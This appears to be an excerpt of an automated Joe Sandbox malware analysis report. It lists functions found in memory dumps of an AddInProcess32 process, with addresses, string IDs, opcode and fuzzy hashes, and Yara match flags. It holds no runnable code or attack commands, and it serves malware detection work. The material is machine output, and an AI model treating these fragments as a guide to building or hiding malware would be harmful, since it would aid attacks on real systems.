            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
            • API String ID: 0-2653619699
            • Opcode ID: bc48d308b24dca004202d7900bc55bb7f1b5f8fda5b47138b5acfd9e77e21dd9
            • Instruction ID: aed6e43c2854a50a8dcd92962d12be9748460ff0f66754fe3c90fc0383244c1b
            • Opcode Fuzzy Hash: bc48d308b24dca004202d7900bc55bb7f1b5f8fda5b47138b5acfd9e77e21dd9
            • Instruction Fuzzy Hash: 36112076700305ABE7259A4C8DC1F6777AEAB94B55F2480197E04DB284D678CE408291
            Function 018DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: Cleanup Group$Threadpool!
            • API String ID: 2994545307-4008356553
            • Opcode ID: 20437901ad72aeb27b8cb57cd33ea17612770bd19920b6bd58c96199c9a7e62d
            • Instruction ID: 2a54fe044d5f2c94b13386fd18e0e7d4d255ed298c1a67c371ca88f784d725fe
            • Opcode Fuzzy Hash: 20437901ad72aeb27b8cb57cd33ea17612770bd19920b6bd58c96199c9a7e62d
            • Instruction Fuzzy Hash: A101F4B2248704EFE311DF18DD45F2677E8E785B15F048939B658C7190E374DA04CB46
            Function 018AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: MUI
            • API String ID: 0-1339004836
            • Opcode ID: e2367041d0942bc63d9eb2d40d904b69ca56f368c72ee5f01df6ba340422852e
            • Instruction ID: 2cf36c933095f45d6cccce63616e3fd43342738f01500bf2b9582484f0526b0c
            • Opcode Fuzzy Hash: e2367041d0942bc63d9eb2d40d904b69ca56f368c72ee5f01df6ba340422852e
            • Instruction Fuzzy Hash: CA827A75E002188FFB25CFA9C880BEDBBB1BF48314F548169E959EB751D770AA81CB50
            Function 018F2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: P`1wRb1w
            • API String ID: 0-487437271
            • Opcode ID: 25d222985419892cb26bd938f1bdc6bb7e4d82c36bec28c49e7815094875635e
            • Instruction ID: bd87e4c9655bc064985446329ddfd0ceda7ae120129e41ed2edf7a8148787cb0
            • Opcode Fuzzy Hash: 25d222985419892cb26bd938f1bdc6bb7e4d82c36bec28c49e7815094875635e
            • Instruction Fuzzy Hash: 3442C075D0425AAAEF29CFACD8446BDBBB1BF45314F24801EEF41EB281D6348B81C750
            Function 018A7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 58582d2024c58d801701fa58b04245dfe14d8186acaa7cd72fd16dc1af65a0e5
            • Instruction ID: ad84c15d70808c89f62df118605b80ac1f38be38bd0ecbd5818fbfa25e30a879
            • Opcode Fuzzy Hash: 58582d2024c58d801701fa58b04245dfe14d8186acaa7cd72fd16dc1af65a0e5
            • Instruction Fuzzy Hash: 9CA16B71608342CFE321DF28C480A2ABBE5BF98704F54496DF589DB351E731EA45CB92
            Function 018C2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: 349360d0964dde5abfaebd9c4c69567618631074d6204d94d39c014e5d1e28bd
            • Instruction ID: f477706ba2437d05cf343b9969ec8468d4bf2d97236e0515b79a128bc9bb3129
            • Opcode Fuzzy Hash: 349360d0964dde5abfaebd9c4c69567618631074d6204d94d39c014e5d1e28bd
            • Instruction Fuzzy Hash: 23F182756047469FDB26CF28C480A6ABBE5BFC8B14F04882DFD49D7281DB34DA46CB52
            Function 00DC65E3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction ID: 244daa25c3c9ecdf4d5288d70142c4168409765209fea0a020699bb4ab01aca1
            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction Fuzzy Hash: 44022DB6E006199FDB14CF99C8805DDFBF2FF88314F1AC1AAD849A7315D674AA418F90
            Function 00DC65DE Relevance: 1.6, Strings: 1, Instructions: 398COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 19e7ea1cd601387271ed8117e0e334857d5e87b922cb38d138e2c7f5ed8a2034
            • Instruction ID: f56a3011472e0809e1da0693c472b6e2262bc57fb10a0f97681e73735cc52d5a
            • Opcode Fuzzy Hash: 19e7ea1cd601387271ed8117e0e334857d5e87b922cb38d138e2c7f5ed8a2034
            • Instruction Fuzzy Hash: 960209B6E00619ABCB14CF99D8815DDF7F2FF88314F1AC1AAD849A7314D774AA418F80
            Function 018A0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3916222277
            • Opcode ID: 4aecd441aa5ee349528dacc2a36716369c5b0d8d78edc9f2905c7c5bb3f0bbb3
            • Instruction ID: e0c4325e67ddfa985dcaa8eefd59dbf574d6a8df0422e29080544cb3be47b72f
            • Opcode Fuzzy Hash: 4aecd441aa5ee349528dacc2a36716369c5b0d8d78edc9f2905c7c5bb3f0bbb3
            • Instruction Fuzzy Hash: C9A15B30A0432D6BFF36CA6C8840BFE6BA55F55308F4940ADFF86EB191D6749B448B51
            Function 01926420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3916222277
            • Opcode ID: 5b844324ab738b98e0ae4d80eeed74c883a6dcabddd56f2d9c979d442adde9bb
            • Instruction ID: 132c124001a839b67e83ed514f8387ba7f8ca8727fe5c674930ea9d2c39f940e
            • Opcode Fuzzy Hash: 5b844324ab738b98e0ae4d80eeed74c883a6dcabddd56f2d9c979d442adde9bb
            • Instruction Fuzzy Hash: CF917271940229AFEB21DB99CC85FAE7BB8EF15B50F104069FA04EB594D674EE00CB61
            Function 00DB2520 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: gfff
            • API String ID: 0-1553575800
            • Opcode ID: 16f0b86f5513089fa129db2b0b4e2da9869b1fae161e5cc2d86bdef98fd6f214
            • Instruction ID: a62278a755b697899361f9759f1144767a93c2ddd8b2efd681d16cc73a9e0151
            • Opcode Fuzzy Hash: 16f0b86f5513089fa129db2b0b4e2da9869b1fae161e5cc2d86bdef98fd6f214
            • Instruction Fuzzy Hash: CD717E72B00119CBDB2CCE6CCCA16BD73A5EB98304F58817DE957CB391EA34ED1186A4
            Function 00DB1210 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: gfff
            • API String ID: 0-1553575800
            • Opcode ID: 117b4a40ac387a34fbd3f9bd1c1f1062ed462b000567856f279386ceae3bd3f7
            • Instruction ID: 8f8e54e14ffe0bfe5d49080bbfb2e1621492e98ce3a653fa69be14860915b669
            • Opcode Fuzzy Hash: 117b4a40ac387a34fbd3f9bd1c1f1062ed462b000567856f279386ceae3bd3f7
            • Instruction Fuzzy Hash: B9717275D0061987CF088F99D8600EEB7B1EF94314F68826AD8196F341EB759E418BD1
            Function 0195B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: PreferredUILanguages
            • API String ID: 0-1884656846
            • Opcode ID: fbeb8b7739c4636a9723a79b8490bff39e2f714bebda336b9920647848d23869
            • Instruction ID: 32ae215acf624e0833c10737a7d1a415684b99e67d11029ffdc2a3baf4341b80
            • Opcode Fuzzy Hash: fbeb8b7739c4636a9723a79b8490bff39e2f714bebda336b9920647848d23869
            • Instruction Fuzzy Hash: 8241A132901219ABDF11DE98C850FEEBBBEAF44750F05056AEE0AFB251D634DE40C7A1
            Function 0194705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: kLsE
            • API String ID: 0-3058123920
            • Opcode ID: 1ce8f71e2cd546ca168860421b0156e76f9a1269c0c37bec70bb0a360b0ca717
            • Instruction ID: 4d1cd5ff4aca34755aa5974d408bcddb6b9d25879081d30159dd26046bf24c6a
            • Opcode Fuzzy Hash: 1ce8f71e2cd546ca168860421b0156e76f9a1269c0c37bec70bb0a360b0ca717
            • Instruction Fuzzy Hash: A841677110934A4BF735EBBCE984FA93F99BB40769F14051CED588B0C5C7704582C7A1
            Function 018D7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: #
            • API String ID: 0-1885708031
            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
            • Instruction ID: b0eb8b83f0d60fbe0bf6f8aec6712db62e81d05e39a3e88ceb2044fa0c8bac39
            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
            • Instruction Fuzzy Hash: 5941C175A0065ADBCF21DF48C890BBEB7B5FF44719F40445AE905D7204DB30DA81CBA2
            Function 018A5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Actx
            • API String ID: 0-89312691
            • Opcode ID: 082bfaac0876a8c4eb2264a9361018c616f75a2cd0aa59645a330355710bd08b
            • Instruction ID: 6f005b5adbcd83b40e8fcef28a9be90075159e350e75d12cc6fc0fa6d272de7e
            • Opcode Fuzzy Hash: 082bfaac0876a8c4eb2264a9361018c616f75a2cd0aa59645a330355710bd08b
            • Instruction Fuzzy Hash: B011E6313846068FFB25491C98507367795FB81368FB8813AE962CB391E675EFC1C380
            Function 0192106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: LdrCreateEnclave
            • API String ID: 0-3262589265
            • Opcode ID: 0beb5d8a59c2996a9f383f83cf85503a2172a1dbfd37ae33ad65fe9544a5d826
            • Instruction ID: 869371f6b0fb239eef1b158d5b5e9bd9a3680ed5b9477008510f70b7967ad389
            • Opcode Fuzzy Hash: 0beb5d8a59c2996a9f383f83cf85503a2172a1dbfd37ae33ad65fe9544a5d826
            • Instruction Fuzzy Hash: 352115B15183449FC320DF2AC845A5BFBE8FBD5B10F104A2EF9A497254D7B09505CB92
            Function 018DE8F0 Relevance: 1.0, Instructions: 985COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2c1fcf0dd83871c1bcb1205556bc8d39a8563d4b0429a123ecd861936bf9fd14
            • Instruction ID: e7c337bb9df0bf2a8846ae9c259ba18ca82388aea2fc842504f438a906c2ecf7
            • Opcode Fuzzy Hash: 2c1fcf0dd83871c1bcb1205556bc8d39a8563d4b0429a123ecd861936bf9fd14
            • Instruction Fuzzy Hash: 82821472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
            Function 018E516C Relevance: .8, Instructions: 785COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 507e7a5bf0bf569d4c3d769cbe1d6356da52849c6015ffc6cf4e7cd6fe26850e
            • Instruction ID: 362e6d4e4e088d1990feb426bd946786d3d0e02ad0a84ad266f5234beb02c7a0
            • Opcode Fuzzy Hash: 507e7a5bf0bf569d4c3d769cbe1d6356da52849c6015ffc6cf4e7cd6fe26850e
            • Instruction Fuzzy Hash: 1262A47A90464A9FCF25CF08D4944AEFBE2BE9231CB49C15CC89AA7605D371BB54CBD0
            Function 018F739A Relevance: .7, Instructions: 705COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d91fd2a7ca1252bf2289b926fb483b811728f405cdf235f20f09c5b35a5ac529
            • Instruction ID: 58b320b29d391722572deed51b9e0b73d2c76cae99d3d397c1b9a6986c983f8b
            • Opcode Fuzzy Hash: d91fd2a7ca1252bf2289b926fb483b811728f405cdf235f20f09c5b35a5ac529
            • Instruction Fuzzy Hash: 6D42A271A006168FEB19CF5DC490ABEBBB2FF88314B14856DD656EB341D734EA42CB90
            Function 018F5AA0 Relevance: .7, Instructions: 652COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
            • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
            • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
            • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
            Function 018CB2C0 Relevance: .6, Instructions: 629COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1c0d4db2dacc36995021ee43c1e33f31e7402246523be7e6aca0e7f0d6023e93
            • Instruction ID: 25762d49e8010778402a1908baeefbd05df0c29a51e1653932b5e8fe226793ff
            • Opcode Fuzzy Hash: 1c0d4db2dacc36995021ee43c1e33f31e7402246523be7e6aca0e7f0d6023e93
            • Instruction Fuzzy Hash: 35329D72E006199BDF14DFA8D891BAEBBB5FF54B54F18002DE805EB381E7359A01CB91
            Function 01938158 Relevance: .6, Instructions: 617COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f3fe3eee3890692eef350aff7c1d48dbec7c4d79c9a531a609dd7bd76935f9eb
            • Instruction ID: 1e27697a9d014a0c0ced8e9cf4bf65416ad09ecaac7e1af6fa296ea92d0d07d7
            • Opcode Fuzzy Hash: f3fe3eee3890692eef350aff7c1d48dbec7c4d79c9a531a609dd7bd76935f9eb
            • Instruction Fuzzy Hash: 3A426C75E002198FEB25CF69C881BADBBF6BF88301F148199E94DEB242D7349985CF51
            Function 018B2840 Relevance: .6, Instructions: 605COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e86fefecda89ec4ee31c644fcff425060363b17a0d6369253aa365a71e41ad30
            • Instruction ID: 7c83657ecfea29866042ab6912f4dd02552ab2aff2d0dbd0d05c61edccc76c87
            • Opcode Fuzzy Hash: e86fefecda89ec4ee31c644fcff425060363b17a0d6369253aa365a71e41ad30
            • Instruction Fuzzy Hash: 6432FF70A007198FDB26CF69C844BBEBBF6BF84704F24451DD98A9B384D735A922CB50
            Function 0194A118 Relevance: .6, Instructions: 591COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 469dbe2ee35025a299b84add010a4d0f7cdd78aeef4c5752c8c428c537eadd8d
            • Instruction ID: 41aea8b7679e366a9b761aaf38f5621f73fe6dd4c977b1f06a9616615f3ff8db
            • Opcode Fuzzy Hash: 469dbe2ee35025a299b84add010a4d0f7cdd78aeef4c5752c8c428c537eadd8d
            • Instruction Fuzzy Hash: DA22DF746846618BEB25CF2DC090F76BBF5AF44305F088859E99F8F286E335E452DB60
            Function 019616CC Relevance: .6, Instructions: 571COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cfc08735e6efe438464ace292f41b5ad7d4b2d4c52a8276d085233bc7f7e2c60
            • Instruction ID: 44cfdd332410041e36dc03e1e1b7aae0bdafec5f7c8b25be3963c75a7acf3567
            • Opcode Fuzzy Hash: cfc08735e6efe438464ace292f41b5ad7d4b2d4c52a8276d085233bc7f7e2c60
            • Instruction Fuzzy Hash: DB22BF35A002168FDB19CF5CC490AAEB7FABFC8305B28457DD959DB345DB34A942CBA0
            Function 018CFB80 Relevance: .6, Instructions: 559COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 81cf424511f18d5ab34a7d04257d8fa9742cd15b9f98f92f602b4dbd16cd893d
            • Instruction ID: 55e8329e6cb4a1837103ec8b1bb0bfea0b4802e9622cf826e0b0f08157beab78
            • Opcode Fuzzy Hash: 81cf424511f18d5ab34a7d04257d8fa9742cd15b9f98f92f602b4dbd16cd893d
            • Instruction Fuzzy Hash: AB22A47490020ADFEB15DF68C880BAEB7B5FF44300F188569E919DB249D735EAC5CB91
            Function 01961D5A Relevance: .6, Instructions: 559COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3452c700bca1bc1d4e646a6e23b2b214c200132ee51785d80756a3f16950c15c
            • Instruction ID: 172bb433e825d86305fc05421d7d643ae444ae0177647f016709d7237cea7f1e
            • Opcode Fuzzy Hash: 3452c700bca1bc1d4e646a6e23b2b214c200132ee51785d80756a3f16950c15c
            • Instruction Fuzzy Hash: B022C3356047128FD719CF18C490A2AB7EAFFC9315F148A6DE99ACB355D730E842CBA1
            Function 018C8DBF Relevance: .6, Instructions: 554COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c848338acb4bd66dcb7f479cd9c519aa24aa870e88371c0e47932721177a777f
            • Instruction ID: 24a7bda043c693ba763d4388cff30c64d2ba894aae432841a36cbaee2f255bdd
            • Opcode Fuzzy Hash: c848338acb4bd66dcb7f479cd9c519aa24aa870e88371c0e47932721177a777f
            • Instruction Fuzzy Hash: 20224E70E0021ADFCB16CF99C4809BEFBF6BF45714B15805AE949EB241E734EA81DB64
            Function 01962446 Relevance: .5, Instructions: 485COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ca7e4ff01815f7171859ab4c57cf8c183efc707aa0673a1731ab23a4d9a0f5f8
            • Instruction ID: cb49ce71f447d13191c8bd0a9e2617ce97f6a68b50022ea3ffdbc610a958ebb2
            • Opcode Fuzzy Hash: ca7e4ff01815f7171859ab4c57cf8c183efc707aa0673a1731ab23a4d9a0f5f8
            • Instruction Fuzzy Hash: 4D0204346046528BDB24CF2DC550775BBF9AF85341B18899AE9DECF282D338E842DB71
            Function 0197B16B Relevance: .4, Instructions: 450COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7f4f7459cde5d6eb36271547b3f92c08a080d0a35234ca6f57d6c434e3598ac7
            • Instruction ID: 83a45ac8cd75fae079b2c3224d35c9fc33a6596745f8a3796521e19b6d1a64eb
            • Opcode Fuzzy Hash: 7f4f7459cde5d6eb36271547b3f92c08a080d0a35234ca6f57d6c434e3598ac7
            • Instruction Fuzzy Hash: 3CF10472E002158FDB18CFADC9A067EBFF6AF98211719416DD85BDB381E634EA41CB50
            Function 00DBFE63 Relevance: .4, Instructions: 435COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 83c4c564971e69279a418e8cb217d521e344c3e8ce1df3868b9fc3f259ee2364
            • Instruction ID: bf943e4649d66e46d92a79653288717cac977cf0803bdcecdcf64c1f54854f25
            • Opcode Fuzzy Hash: 83c4c564971e69279a418e8cb217d521e344c3e8ce1df3868b9fc3f259ee2364
            • Instruction Fuzzy Hash: 2D026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
            Function 0197A9A6 Relevance: .4, Instructions: 425COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b15681fc2d4d28fffa7ad8310cbbd5e7115fc1914bfe616abc2c8cf5ea51a0f4
            • Instruction ID: bfdcc6dc869d967681b3c446105b5c64bd6868cb755bb9a25d583c67b737370c
            • Opcode Fuzzy Hash: b15681fc2d4d28fffa7ad8310cbbd5e7115fc1914bfe616abc2c8cf5ea51a0f4
            • Instruction Fuzzy Hash: 28F1C373E005269BCB19DEA8C5A05BDFFF5AF54211B1D4269D85AEB380D734EE40CB90
            Function 018CFDC0 Relevance: .4, Instructions: 390COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 92b15a664d348dd0c41b27067754c865767640fa4a7848cd2e22d10fad50d1e5
            • Instruction ID: c5b478456e43efb67445bcd5abf95ee5fd0fb0faf9576101c013361ab5d94200
            • Opcode Fuzzy Hash: 92b15a664d348dd0c41b27067754c865767640fa4a7848cd2e22d10fad50d1e5
            • Instruction Fuzzy Hash: 0EF17170D0020ADFDF15DFA8C580AAEBBB5FF44304F1885A9E919DB24AE735DA85CB50
            Function 018A65D0 Relevance: .4, Instructions: 383COMMON
            Download Yara Rule
            Memory Dump Source
